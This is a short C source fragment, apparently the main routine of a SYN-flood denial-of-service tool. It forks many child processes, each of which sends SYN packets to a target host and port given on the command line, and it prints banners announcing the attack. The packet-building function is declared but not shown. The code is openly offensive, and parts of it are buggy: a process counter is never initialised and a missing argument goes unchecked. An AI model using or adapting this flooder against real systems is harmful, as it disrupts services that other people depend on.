
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MAX_CHILDREN ;
 int atoi (char*) ;
 int die (char*) ;
 int dosynpacket (char*,char*,int) ;
 int exit (int ) ;
 int fork () ;
 int fprintf (int ,char*,...) ;
 int stdout ;
 int usage () ;
 int wait (int *) ;

main(int argc, char *argv[])

{
 int i=0,childs;
 if (argc<3) usage();
 fprintf (stdout,"\n[*] Let's start dos  [*]\n");
      fprintf (stdout, "[*] Wait 30 sec and after try ping %s at port %d [*]\n",argv[2],atoi(argv[3]));
        fprintf (stdout, "[*] www.mojodo.it    [*]\n");
 fprintf (stdout, "[*] esc with ctrl+c  [*]\n\n");

 for (i ; i<400 ;i++)
 {
  if(childs >= MAX_CHILDREN) wait(((void*)0)) ;
  switch (fork())
   {
    case 0:
    dosynpacket(argv[1],argv[2],atoi(argv[3]));
    exit(0);
                         case -1:
                          die("fork");
    default:
                         childs++;
                         break;
   }


 }while(childs--) wait(((void*)0));
}
